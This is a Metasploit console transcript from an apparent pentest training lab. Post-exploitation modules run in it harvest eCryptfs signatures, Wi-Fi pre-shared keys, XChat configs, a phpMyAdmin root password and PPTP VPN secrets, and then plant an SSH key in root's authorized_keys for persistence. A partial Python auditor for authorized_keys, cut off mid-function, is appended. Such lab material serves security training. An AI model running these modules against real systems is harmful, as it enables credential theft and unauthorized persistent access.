[+] File stored in: /root/.msf4/loot/20230324143535_default_192.198.6.3_ecryptfs.sigcac_464389.txt
[*] Post module execution completed
msf5 post(linux/gather/ecryptfs_creds) > loot

Loot
====

host         service  type                    name                   content     info                            path
----         -------  ----                    ----                   -------     ----                            ----
192.198.6.3           ecryptfs.sig-cache.txt                         text/plain  eCryptfs sig-cache.txt File     /root/.msf4/loot/20230324143535_default_192.198.6.3_ecryptfs.sigcac_464389.txt
msf5 post(linux/gather/ecryptfs_creds) > cat /root/.msf4/loot/20230324143535_default_192.198.6.3_ecryptfs.sigcac_464389.txt
[*] exec: cat /root/.msf4/loot/20230324143535_default_192.198.6.3_ecryptfs.sigcac_464389.txt

3b32b64d6121597a
msf5 post(linux/gather/ecryptfs_creds) > use post/linux/gather/enum_psk
msf5 post(linux/gather/enum_psk) > info

       Name: Linux Gather 802-11-Wireless-Security Credentials
     Module: post/linux/gather/enum_psk
   Platform: Linux
       Arch: 
       Rank: Normal

Provided by:
  Cenk Kalpakoglu

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name     Current Setting                          Required  Description
  ----     ---------------                          --------  -----------
  DIR      /etc/NetworkManager/system-connections/  yes       The default path for network connections
  SESSION                                           yes       The session to run this module on.

Description:
  This module collects 802-11-Wireless-Security credentials such as 
  Access-Point name and Pre-Shared-Key from your target CLIENT Linux 
  machine using /etc/NetworkManager/system-connections/ files. The 
  module gathers NetworkManager's plaintext "psk" information.

msf5 post(linux/gather/enum_psk) > set SESSION 2
SESSION => 2
msf5 post(linux/gather/enum_psk) > exploit

[*] Reading file /etc/NetworkManager/system-connections/TopSecret_Network
[*] Reading file /etc/NetworkManager/system-connections/Wi-Fi connection 1
[*] Reading file /etc/NetworkManager/system-connections/Wi-Fi connection 2

802-11-wireless-security
========================

 AccessPoint-Name    PSK
 ----------------    ---
 Wi-Fi connection 1  AttackDefence_WiFi_123321
 Wi-Fi connection 2  Free_Internet

[+] Secrets stored in: /root/.msf4/loot/20230324144135_default_192.198.6.3_linux.psk.creds_605438.txt
[*] Done
[*] Post module execution completed
msf5 post(linux/gather/enum_psk) > loot

Loot
====

host         service  type                    name                      content     info                            path
----         -------  ----                    ----                      -------     ----                            ----
192.198.6.3           linux.psk.creds         wireless_credentials.txt  text/csv                                    /root/.msf4/loot/20230324144135_default_192.198.6.3_linux.psk.creds_605438.txt
msf5 post(linux/gather/enum_psk) > cat /root/.msf4/loot/20230324144135_default_192.198.6.3_linux.psk.creds_605438.txt
[*] exec: cat /root/.msf4/loot/20230324144135_default_192.198.6.3_linux.psk.creds_605438.txt

AccessPoint-Name,PSK
"Wi-Fi connection 1","AttackDefence_WiFi_123321"
"Wi-Fi connection 2","Free_Internet"
msf5 post(linux/gather/enum_psk) > use post/linux/gather/enum_xchat
msf5 post(linux/gather/enum_xchat) > info

       Name: Linux Gather XChat Enumeration
     Module: post/linux/gather/enum_xchat
   Platform: Linux
       Arch: 
       Rank: Normal

Provided by:
  sinn3r <sinn3r@metasploit.com>

Compatible session types:
  Meterpreter
  Shell

Available actions:
  Name     Description
  ----     -----------
  ALL      Collect both the plists and chat logs
  CHATS    Collect chat logs with a pattern
  CONFIGS  Collect XCHAT's config files

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module will collect XChat's config files and chat logs from the 
  victim's machine. There are three actions you may choose: CONFIGS, 
  CHATS, and ALL. The CONFIGS option can be used to collect 
  information such as channel settings, channel/server passwords, etc. 
  The CHATS option will simply download all the .log files.
msf5 post(linux/gather/enum_xchat) > set SESSION 2
SESSION => 2
msf5 post(linux/gather/enum_xchat) > exploit

[+] 192.198.6.3:55958 - servlist_.conf saved as /root/.msf4/loot/20230324144821_default_192.198.6.3_xchat.config_717304.txt
[+] 192.198.6.3:55958 - xchat.conf saved as /root/.msf4/loot/20230324144821_default_192.198.6.3_xchat.config_128075.txt
[*] Post module execution completed
msf5 post(linux/gather/enum_xchat) > loot

Loot
====

host         service  type                    name                      content     info                            path
----         -------  ----                    ----                      -------     ----                            ----
192.198.6.3           xchat.config            servlist_.conf            text/plain                                  /root/.msf4/loot/20230324144821_default_192.198.6.3_xchat.config_717304.txt
192.198.6.3           xchat.config            xchat.conf                text/plain                                  /root/.msf4/loot/20230324144821_default_192.198.6.3_xchat.config_128075.txt
msf5 post(linux/gather/enum_xchat) > cat /root/.msf4/loot/20230324144821_default_192.198.6.3_xchat.config_717304.txt
[*] exec: cat /root/.msf4/loot/20230324144821_default_192.198.6.3_xchat.config_717304.txt

v=2.8.8

N=irc.oftc.net
J=#llvm
E=IRC (Latin/Unicode Hybrid)
F=27
D=0
S=irc.oftc.net/6667

N=Debian Servers
J=#debian
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.debian.org

N=Ubuntu Servers
J=#ubuntu
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.ubuntu.com/8001

N=2600net
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.2600.net

N=7-indonesia
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.7-indonesia.org

N=AccessIRC
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.accessirc.net
S=eu.accessirc.net

N=AfterNET
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.afternet.org
S=us.afternet.org
S=eu.afternet.org

N=Aitvaras
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.data.lt/+6668
S=irc-ssl.omnitel.net/+6668
S=irc-ssl.le.lt/+9999
S=irc.data.lt
S=irc.omnitel.net
S=irc.ktu.lt
S=irc.le.lt
S=irc.takas.lt
S=irc.5ci.net
S=irc.kis.lt

N=AmigaNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.amiganet.org
S=us.amiganet.org
S=uk.amiganet.org

N=ARCNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=se1.arcnet.vapor.com
S=us1.arcnet.vapor.com
S=us2.arcnet.vapor.com
S=us3.arcnet.vapor.com
S=ca1.arcnet.vapor.com
S=de1.arcnet.vapor.com
S=de3.arcnet.vapor.com
S=ch1.arcnet.vapor.com
S=be1.arcnet.vapor.com
S=nl3.arcnet.vapor.com
S=uk1.arcnet.vapor.com
S=uk2.arcnet.vapor.com
S=fr1.arcnet.vapor.com

N=AstroLink
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.astrolink.org

N=AustNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=au.austnet.org
S=us.austnet.org
S=ca.austnet.org

N=AzzurraNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.azzurra.org
S=crypto.azzurra.org

N=Beirut
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.beirut.com

N=ChattingAway
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.chattingaway.com

N=ChatJunkies
J=#xchat
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.chatjunkies.org
S=nl.chatjunkies.org

N=ChatNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=US.ChatNet.Org
S=EU.ChatNet.Org

N=ChatSociety
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=us.chatsociety.net
S=eu.chatsociety.net

N=ChatSpike
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.chatspike.net

N=ChillFactory
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.chillfactory.net

N=CoolChat
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.coolchat.net

N=Criten
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.criten.net
S=irc.eu.criten.net

N=DALnet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.dal.net
S=irc.eu.dal.net

N=Dark-Tou-Net
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.d-t-net.de
S=bw.d-t-net.de
S=nc.d-t-net.de
S=wakka.d-t-net.de

N=DarkMyst
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.darkmyst.org

N=DeepIRC
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.deepirc.net

N=DeltaAnime
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.deltaanime.net

N=EFnet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.blackened.com
S=irc.Prison.NET
S=irc.Qeast.net
S=irc.efnet.pl
S=efnet.demon.co.uk
S=irc.lightning.net
S=irc.mindspring.com
S=irc.easynews.com
S=irc.servercentral.net

N=EnterTheGame
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=IRC.EnterTheGame.Com

N=EUIrc
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.euirc.net
S=irc.ham.de.euirc.net
S=irc.ber.de.euirc.net
S=irc.ffm.de.euirc.net
S=irc.bre.de.euirc.net
S=irc.hes.de.euirc.net
S=irc.vie.at.euirc.net
S=irc.inn.at.euirc.net
S=irc.bas.ch.euirc.net

N=EuropNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.europnet.org

N=EU-IRC
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.eu-irc.net

N=FDFNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.fdfnet.net
S=irc.eu.fdfnet.net

N=FEFNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.fef.net
S=irc.ggn.net
S=irc.vendetta.com

N=FreeNode
J=#vim,#python,#bash
E=IRC (Latin/Unicode Hybrid)
F=27
D=0
S=irc.freenode.net/8001

N=GalaxyNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.galaxynet.org

N=GamesNET
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.gamesnet.net
S=irc.ca.gamesnet.net
S=irc.eu.gamesnet.net

N=GeekShed
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.geekshed.net

N=German-Elite
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=dominion.german-elite.net
S=komatu.german-elite.net

N=GimpNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.gimp.org
S=irc.us.gimp.org

N=HabberNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.habber.net

N=Hashmark
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.hashmark.net

N=IdleMonkeys
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.idlemonkeys.net

N=iZ-smart.net
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.iZ-smart.net/6666
S=irc.iZ-smart.net/6667
S=irc.iZ-smart.net/6668

N=IrcLink
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.irclink.net
S=Alesund.no.eu.irclink.net
S=Oslo.no.eu.irclink.net
S=frogn.no.eu.irclink.net
S=tonsberg.no.eu.irclink.net

N=IRCNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.ircnet.com
S=irc.stealth.net/6668
S=ircnet.demon.co.uk
S=irc.datacomm.ch
S=random.ircd.de
S=ircnet.netvision.net.il
S=irc.cs.hut.fi

N=Irctoo.net
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.irctoo.net

N=Krstarica
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.krstarica.com

N=Librenet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.librenet.net
S=ielf.fr.librenet.net

N=LinkNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.link-net.org
S=irc.no.link-net.org
S=irc.bahnhof.se

N=MagicStar
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.magicstar.net

N=Majistic
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.majistic.net

N=MindForge
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.mindforge.org

N=MintIRC
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.mintirc.net

N=MIXXnet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.mixxnet.net

N=NeverNET
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.nevernet.net
S=imagine.nevernet.net
S=dimension.nevernet.net
S=universe.nevernet.net
S=wayland.nevernet.net
S=forte.nevernet.net

N=NixHelpNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.nixhelp.org
S=us.nixhelp.org
S=uk.nixhelp.org
S=uk2.nixhelp.org
S=uk3.nixhelp.org
S=nl.nixhelp.org
S=ca.ld.nixhelp.org
S=us.co.nixhelp.org
S=us.ca.nixhelp.org
S=us.pa.nixhelp.org

N=NullusNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.nullus.net

N=Oceanius
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.oceanius.com

N=OFTC
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.oftc.net

N=OtherNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.othernet.org

N=OzNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.oz.org
S=germany.oz.org
S=sandiego.oz.org
S=us.oz.org
S=au.oz.org
S=rockhampton.oz.org
S=wollongong.oz.org
S=waix.oz.org

N=PTlink
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.PTlink.net
S=aaia.PTlink.net

N=PTNet, ISP's
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.PTNet.org
S=rccn.PTnet.org
S=EUnet.PTnet.org
S=madinfo.PTnet.org
S=netc2.PTnet.org
S=netc1.PTnet.org
S=telepac1.ptnet.org
S=esoterica.PTnet.org
S=ip-hub.ptnet.org
S=telepac1.ptnet.org
S=nortenet.PTnet.org

N=PTNet, UNI
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.PTNet.org
S=rccn.PTnet.org
S=uevora.PTnet.org
S=umoderna.PTnet.org
S=ist.PTnet.org
S=aaum.PTnet.org
S=uc.PTnet.org
S=ualg.ptnet.org
S=madinfo.PTnet.org
S=ua.PTnet.org
S=ipg.PTnet.org
S=isec.PTnet.org
S=utad.PTnet.org
S=iscte.PTnet.org
S=ubi.PTnet.org

N=QuakeNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.quakenet.org
S=irc.se.quakenet.org
S=irc.dk.quakenet.org
S=irc.no.quakenet.org
S=irc.fi.quakenet.org
S=irc.be.quakenet.org
S=irc.uk.quakenet.org
S=irc.de.quakenet.org
S=irc.it.quakenet.org

N=RebelChat
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.rebelchat.org

N=RizeNET
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.rizenet.org
S=omega.rizenet.org
S=evelance.rizenet.org
S=lisa.rizenet.org
S=scott.rizenet.org

N=Rizon
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.rizon.net

N=RusNet
E=KOI8-R (Cyrillic)
F=19
D=0
S=irc.tomsk.net
S=irc.rinet.ru
S=irc.run.net
S=irc.ru
S=irc.lucky.net

N=SceneNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.scene.org
S=irc.eu.scene.org
S=irc.us.scene.org

N=SeilEn.de
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.seilen.de

N=SlashNET
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.slashnet.org
S=area51.slashnet.org
S=moo.slashnet.org
S=radon.slashnet.org

N=Sohbet.Net
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.sohbet.net

N=SolidIRC
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.solidirc.com

N=SorceryNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.sorcery.net/9000
S=irc.us.sorcery.net/9000
S=irc.eu.sorcery.net/9000

N=Spidernet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=us.spidernet.org
S=eu.spidernet.org
S=irc.spidernet.org

N=StarChat
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.starchat.net
S=gainesville.starchat.net
S=freebsd.starchat.net
S=sunset.starchat.net
S=revenge.starchat.net
S=tahoma.starchat.net
S=neo.starchat.net

N=TNI3
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.tni3.com

N=TURLINet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.turli.net
S=irc.servx.ru
S=irc.gavnos.ru

N=UnderNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=us.undernet.org
S=eu.undernet.org

N=UniBG
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.lirex.com
S=irc.naturella.com
S=irc.spnet.net
S=irc.techno-link.com
S=irc.telecoms.bg
S=irc.tu-varna.edu

N=Whiffle
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.whiffle.org

N=Worldnet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.worldnet.net
S=irc.fr.worldnet.net

N=Xentonix.net
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.xentonix.net

N=XWorld
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=Buffalo.NY.US.XWorld.org
S=Minneapolis.MN.US.Xworld.Org
S=Rochester.NY.US.XWorld.org
S=Bayern.DE.EU.XWorld.Org
S=Chicago.IL.US.XWorld.Org
msf5 post(linux/gather/enum_xchat) > cat /root/.msf4/loot/20230324144821_default_192.198.6.3_xchat.config_128075.txt
[*] exec: cat /root/.msf4/loot/20230324144821_default_192.198.6.3_xchat.config_128075.txt

version = 2.8.8
auto_save = 1
auto_save_url = 0
away_auto_unmark = 0
away_reason = I'm busy
away_show_message = 0
away_show_once = 1
away_size_max = 300
away_timeout = 60
away_track = 1
completion_amount = 5
completion_auto = 0
completion_sort = 0
completion_suffix = :
dcc_auto_chat = 0
dcc_auto_resume = 1
dcc_auto_send = 2
dcc_blocksize = 1024
dcc_completed_dir = 
dcc_fast_send = 1
dcc_global_max_get_cps = 0
dcc_global_max_send_cps = 0
dcc_ip = 
dcc_ip_from_server = 1
dcc_max_get_cps = 0
dcc_max_send_cps = 0
dcc_permissions = 384
dcc_port_first = 0
dcc_port_last = 0
dcc_remove = 0
dcc_save_nick = 0
dcc_send_fillspaces = 0
dcc_stall_timeout = 60
dcc_timeout = 180
dnsprogram = host
flood_ctcp_num = 5
flood_ctcp_time = 30
flood_msg_num = 5
flood_msg_time = 30
gui_auto_open_chat = 1
gui_auto_open_dialog = 1
gui_auto_open_recv = 1
gui_auto_open_send = 1
gui_dialog_height = 256
gui_dialog_left = 0
gui_dialog_top = 0
gui_dialog_width = 500
gui_hide_menu = 1
gui_input_spell = 1
gui_input_style = 0
gui_join_dialog = 0
gui_lagometer = 1
gui_mode_buttons = 0
gui_pane_left_size = 127
gui_pane_right_size = 100
gui_quit_dialog = 0
gui_slist_select = 28
gui_slist_skip = 1
gui_throttlemeter = 1
gui_topicbar = 0
gui_tray = 0
gui_tray_flags = 0
gui_tweaks = 0
gui_ulist_buttons = 0
gui_ulist_doubleclick = QUOTE WHOIS %s %s
gui_ulist_hide = 1
gui_ulist_left = 0
gui_ulist_pos = 3
gui_ulist_resizable = 1
gui_ulist_show_hosts = 0
gui_ulist_sort = 0
gui_ulist_style = 1
gui_url_mod = 4
gui_usermenu = 0
gui_win_height = 646
gui_win_left = 142
gui_win_save = 1
gui_win_state = 0
gui_win_top = 20
gui_win_width = 995
input_balloon_chans = 0
input_balloon_hilight = 1
input_balloon_priv = 1
input_balloon_time = 20
input_beep_chans = 0
input_beep_hilight = 0
input_beep_msg = 0
input_command_char = /
input_filter_beep = 0
input_flash_chans = 0
input_flash_hilight = 1
input_flash_priv = 1
input_perc_ascii = 0
input_perc_color = 0
input_tray_chans = 0
input_tray_hilight = 1
input_tray_priv = 1
irc_auto_rejoin = 0
irc_ban_type = 2
irc_conf_mode = 0
irc_extra_hilight = 
irc_hide_version = 0
irc_id_ntext = 
irc_id_ytext = 
irc_invisible = 0
irc_join_delay = 3
irc_logging = 0
irc_logmask = %n-%c.log
irc_nick_hilight = 
irc_no_hilight = NickServ,ChanServ
irc_part_reason = Leaving
irc_quit_reason = Leaving
irc_raw_modes = 0
irc_servernotice = 0
irc_skip_motd = 0
irc_wallops = 0
irc_who_join = 1
irc_whois_front = 0
net_auto_reconnect = 1
net_auto_reconnectonfail = 0
net_bind_host = 
net_ping_timeout = 0
net_proxy_auth = 0
net_proxy_host = 
net_proxy_pass = 
net_proxy_port = 0
net_proxy_type = 0
net_proxy_use = 0
net_proxy_user = 
net_reconnect_delay = 10
net_throttle = 1
notify_timeout = 15
notify_whois_online = 0
perl_warnings = 0
sound_command = 
stamp_log = 1
stamp_log_format = %b %d %H:%M:%S 
stamp_text = 1
stamp_text_format = 16-%M-0
tab_chans = 1
tab_dialogs = 1
tab_layout = 2
tab_new_to_front = 2
tab_notices = 1
tab_pos = 1
tab_position = 2
tab_server = 1
tab_small = 0
tab_sort = 1
tab_trunc = 20
tab_utils = 0
text_background = 
text_color_nicks = 0
text_font = DejaVu Sans Mono 8
text_indent = 1
text_max_indent = 256
text_max_lines = 500
text_replay = 0
text_show_marker = 1
text_show_sep = 1
text_stripcolor = 0
text_thin_sep = 1
text_tint_blue = 220
text_tint_green = 220
text_tint_red = 220
text_transparent = 1
text_wordwrap = 1
msf5 post(linux/gather/enum_xchat) > use post/linux/gather/phpmyadmin_credsteal
msf5 post(linux/gather/phpmyadmin_credsteal) > info

       Name: Phpmyadmin credentials stealer
     Module: post/linux/gather/phpmyadmin_credsteal
   Platform: Linux
       Arch: 
       Rank: Normal

Provided by:
  Chaitanya Haritash [bofheaded]
  Dhiraj Mishra <dhiraj@notsosecure.com>

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module gathers Phpmyadmin creds from target linux machine.

msf5 post(linux/gather/phpmyadmin_credsteal) > set SESSION 2
SESSION => 2
msf5 post(linux/gather/phpmyadmin_credsteal) > exploit


PhpMyAdmin Creds Stealer!

[+] PhpMyAdmin config found!
[+] Extracting creds
[+] User: root
[+] Password: N0tE@syT0Guess!!
[*] Storing credentials...
[+] Config file located at /root/.msf4/loot/20230324145715_default_192.198.6.3_phpmyadmin_conf_237256.txt
[*] Post module execution completed
msf5 post(linux/gather/phpmyadmin_credsteal) > loot

Loot
====

host         service  type                    name                      content     info                            path
----         -------  ----                    ----                      -------     ----                            ----
192.198.6.3           phpmyadmin_conf         phpmyadmin_conf.txt       text/plain  phpmyadmin_conf                 /root/.msf4/loot/20230324145715_default_192.198.6.3_phpmyadmin_conf_237256.txt
msf5 post(linux/gather/phpmyadmin_credsteal) > cat /root/.msf4/loot/20230324145715_default_192.198.6.3_phpmyadmin_conf_237256.txt
[*] exec: cat /root/.msf4/loot/20230324145715_default_192.198.6.3_phpmyadmin_conf_237256.txt

<?php
##
## database access settings in php format
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf
## by /usr/sbin/dbconfig-generate-include
##
## by default this file is managed via ucf, so you shouldn't have to
## worry about manual changes being silently discarded.  *however*,
## you'll probably also want to edit the configuration file mentioned
## above too.
##
$dbuser='root';
$dbpass='N0tE@syT0Guess!!';
$basepath='';
$dbname='phpmyadmin';
$dbserver='localhost';
$dbport='';
$dbtype='mysql';
msf5 post(linux/gather/phpmyadmin_credsteal) > use post/linux/gather/pptpd_chap_secrets
msf5 post(linux/gather/pptpd_chap_secrets) > info

       Name: Linux Gather PPTP VPN chap-secrets Credentials
     Module: post/linux/gather/pptpd_chap_secrets
   Platform: Linux
       Arch: 
       Rank: Normal

Provided by:
  sinn3r <sinn3r@metasploit.com>

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name     Current Setting        Required  Description
  ----     ---------------        --------  -----------
  FILE     /etc/ppp/chap-secrets  yes       The default path for chap-secrets
  SESSION                         yes       The session to run this module on.

Description:
  This module collects PPTP VPN information such as client, server, 
  password, and IP from your target server's chap-secrets file.

msf5 post(linux/gather/pptpd_chap_secrets) > set SESSION 2
SESSION => 2
msf5 post(linux/gather/pptpd_chap_secrets) > exploit

PPTPd chap-secrets
==================

 Client  Server                Secret          IP
 ------  ------                ------          --
 jackie  attackdefense.com     HiddenNetwork   10.10.10.10
 ninja   pentesteracademy.com  LearningIsReal  216.146.39.125
 peter   underground.onion     ReallySecure!!  246.234.63.133

[+] Secrets stored in: /root/.msf4/loot/20230324150314_default_192.198.6.3_linux.chapsecret_875395.txt
[*] Post module execution completed

msf5 post(linux/gather/pptpd_chap_secrets) > loot

Loot
====

host         service  type                     name                      content     info                            path
----         -------  ----                     ----                      -------     ----                            ----
192.198.6.3           linux.chapsecrets.creds  chap-secrets.txt          text/csv                                    /root/.msf4/loot/20230324150314_default_192.198.6.3_linux.chapsecret_875395.txt
msf5 post(linux/gather/pptpd_chap_secrets) > cat /root/.msf4/loot/20230324150314_default_192.198.6.3_linux.chapsecret_875395.txt
[*] exec: cat /root/.msf4/loot/20230324150314_default_192.198.6.3_linux.chapsecret_875395.txt

Client,Server,Secret,IP
"jackie","attackdefense.com","HiddenNetwork","10.10.10.10"
"ninja","pentesteracademy.com","LearningIsReal","216.146.39.125"
"peter","underground.onion","ReallySecure!!","246.234.63.133"
msf5 post(linux/gather/pptpd_chap_secrets) > use post/linux/manage/sshkey_persistence
msf5 post(linux/manage/sshkey_persistence) > info

       Name: SSH Key Persistence
     Module: post/linux/manage/sshkey_persistence
   Platform: Linux
       Arch: 
       Rank: Excellent

Provided by:
  h00die <mike@shorebreaksecurity.com>

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name             Current Setting       Required  Description
  ----             ---------------       --------  -----------
  CREATESSHFOLDER  false                 yes       If no .ssh folder is found, create it for a user
  PUBKEY                                 no        Public Key File to use. (Default: Create a new one)
  SESSION                                yes       The session to run this module on.
  SSHD_CONFIG      /etc/ssh/sshd_config  yes       sshd_config file
  USERNAME                               no        User to add SSH key to (Default: all users on box)

Description:
  This module will add an SSH key to a specified user (or all), to 
  allow remote login via SSH at any time.

msf5 post(linux/manage/sshkey_persistence) > set SESSION 2
SESSION => 2

msf5 post(linux/manage/sshkey_persistence) > exploit

[*] Checking SSH Permissions
[-] Failed to open file: /etc/ssh/sshd_config: core_channel_open: Operation failed: 1
[*] Authorized Keys File: .ssh/authorized_keys
[*] Finding .ssh directories
[+] Storing new private key as /root/.msf4/loot/20230324150923_default_192.198.6.3_id_rsa_867328.txt
[*] Adding key to /root/.ssh/authorized_keys
[+] Key Added
[*] Post module execution completed
msf5 post(linux/manage/sshkey_persistence) > loot

Loot
====

host         service  type                     name                      content     info                            path
----         -------  ----                     ----                      -------     ----                            ----
192.198.6.3           id_rsa                   ssh_id_rsa                text/plain  OpenSSH Private Key File        /root/.msf4/loot/20230324150923_default_192.198.6.3_id_rsa_867328.txt
msf5 post(linux/manage/sshkey_persistence) > cat /root/.msf4/loot/20230324150923_default_192.198.6.3_id_rsa_867328.txt
[*] exec: cat /root/.msf4/loot/20230324150923_default_192.198.6.3_id_rsa_867328.txt

-----BEGIN RSA PRIVATE KEY-----
[private key material omitted]
-----END RSA PRIVATE KEY-----
msf5 post(linux/manage/sshkey_persistence) > ssh -i /root/.msf4/loot/20230324150923_default_192.198.6.3_id_rsa_867328.txt root@192.198.6.3
[*] exec: ssh -i /root/.msf4/loot/20230324150923_default_192.198.6.3_id_rsa_867328.txt root@192.198.6.3

ssh: connect to host 192.198.6.3 port 22: Connection refused
msf5 post(linux/manage/sshkey_persistence) > services
Services
========

host         port  proto  name         state  info
----         ----  -----  ----         -----  ----
192.198.6.3  139   tcp    netbios-ssn  open   Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.198.6.3  445   tcp    netbios-ssn  open   Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.198.6.3  1723  tcp    pptp         open
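
A defensive counterpart to the sshkey_persistence run above, as an added example that is not part of the original lab notes: it audits an authorized_keys file against a set of approved key fingerprints, so a key appended the way the module did is reported as unapproved. The key blobs, comments and the approved set are constructed sample data, not real keys.

```python
import base64
import binascii
import hashlib

KEY_PREFIXES = ("ssh-", "ecdsa-sha2-", "sk-ssh-", "sk-ecdsa-")

def split_entry(line):
    """Split one authorized_keys line into (key_type, blob, comment)."""
    # A leading options field may hold quoted spaces, so skip it with a
    # quote-aware scan instead of a plain split().
    if not line.startswith(KEY_PREFIXES):
        in_quotes, i = False, 0
        while i < len(line) and (in_quotes or not line[i].isspace()):
            if line[i] == "\\" and in_quotes:
                i += 1                      # step over the escaped character
            elif line[i] == '"':
                in_quotes = not in_quotes
            i += 1
        line = line[i:].lstrip()
    parts = line.split(None, 2)
    if len(parts) < 2:
        raise ValueError("missing key type or key data")
    return parts[0], parts[1], parts[2] if len(parts) > 2 else ""

def fingerprint(key_type, blob_b64):
    """SHA256 fingerprint in the format printed by `ssh-keygen -l`."""
    raw = base64.b64decode(blob_b64, validate=True)
    # The blob starts with a length-prefixed copy of the key type name.
    name_len = int.from_bytes(raw[:4], "big")
    if len(raw) < 4 or raw[4:4 + name_len] != key_type.encode():
        raise ValueError("key type does not match the encoded key data")
    digest = hashlib.sha256(raw).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def audit(text, approved):
    """Return (line_no, status, key_type, detail) for every key entry."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        try:
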